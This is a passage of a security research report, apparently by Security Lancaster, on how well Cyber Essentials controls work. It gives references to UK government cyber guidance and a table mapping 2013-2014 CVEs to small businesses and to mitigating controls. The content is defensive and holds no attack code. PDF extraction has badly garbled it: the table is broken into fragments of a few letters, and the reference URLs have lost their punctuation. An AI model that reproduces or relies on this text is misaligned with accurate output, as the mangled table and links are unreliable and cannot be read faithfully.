References[1] Centre for the Protection of
National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk
governmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov
ukgovernmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww
govukgovernmentnewscyber-
security-boost-for-uk-firmsJanuary 2015
[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013
[5] CREST Cyber essentialscertified companies http
wwwcyberessentialsorglistMarch 2015
[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout
terminologyhtml
[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov
ukgovernmentpublicationscyber-
essentials-scheme-overview
[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400106Common_Cyber_Attacks-
Reducing_The_Impactpdf January2015
[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum
comindexphpcyber-security-
clustersnorth-west-lsquo-cluster2015
[10] HM Government Cyber essentialscertified companies https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400914bis-15-72-cyber-
essentials-scheme-assurance-
frameworkpdf January 2015
[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus
enproduct_securitysuperfish_
uninstall
[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-0160 2014
[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-6271 2014
[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin
cvenamecginame=CVE-2015-20772015
[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom
archives20140408half-a-
million-widely-trusted-websites-
vulnerable-to-heartbleed-
bughtml April 2014
[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file60961uk-cyber-security-
strategy-finalpdf November 2011
[17] Cabinet Office and The Rt HonFrancis Maude MP Governmentmandates new cyber security standardfor suppliers httpswwwgov
ukgovernmentnewsgovernment-
mandates-new-cyber-security-
standard-for-suppliers September2014
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 13 of 28
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
